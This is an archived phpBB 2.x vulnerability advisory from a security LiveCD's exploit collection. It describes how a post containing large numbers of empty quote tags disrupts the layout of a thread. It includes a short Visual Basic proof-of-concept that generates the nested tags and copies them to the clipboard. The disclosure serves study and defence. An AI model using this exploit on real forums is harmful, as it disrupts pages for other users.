home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / phpbb / phpbbquoteflaw.txt < prev    next >
Text File  |  2005-02-12  |  1KB  |  41 lines
  1. Affected Software: phpBB 2.x (tested on 2.0.4 and 2.0.8, untested on later versions)
  2. Vulnerability: flaw in code handling the quoting of posts.
  3. Severity: Low
  4.  
  5. Discovered by: Matt Benenati <darkk88[AT]gmail.com>
  6.  
  7. +Details+
  8. =========
  9.  
  10. This flaw could allow a malicious user
  11. to alter the alignment and layout of any posts in the same thread as the exploit post.
  12.  
  13. The exploit just involves using an absurd amount of blank quotes in a single post.
  14.  
  15. +Exploit Code+
  16. =============
  17.  
  18. 'phpBB Quote Exploit
  19. 'Copyright (C) 2004 by Matt Benenati
  20. '
  21. 'text is automaticly copied to the windows clipboard
  22. 'user just has to paste the text into a post to execute the exploit
  23. Private Sub Command1_Click()
  24. Dim xptext As String
  25. Dim num1 As Integer, num2 As Integer, num3 As Integer, num4 As Integer
  26. num1% = 0
  27. num2% = 100
  28. num3% = 0
  29. num4% = 100
  30. 1: xptext$ = xptext$ & "[quote]"
  31. num1% = num1% + 1
  32. If num1% = num2% Then GoTo 2 Else GoTo 1
  33. 2: xptext$ = xptext$ & "[/quote]"
  34. num3% = num3% + 1
  35. If num3% = num4% Then GoTo 3 Else GoTo 2
  36. 3: Clipboard.Clear
  37. Clipboard.SetText xptext$ 
  38. End Sub
  39.  
  40.  
  41.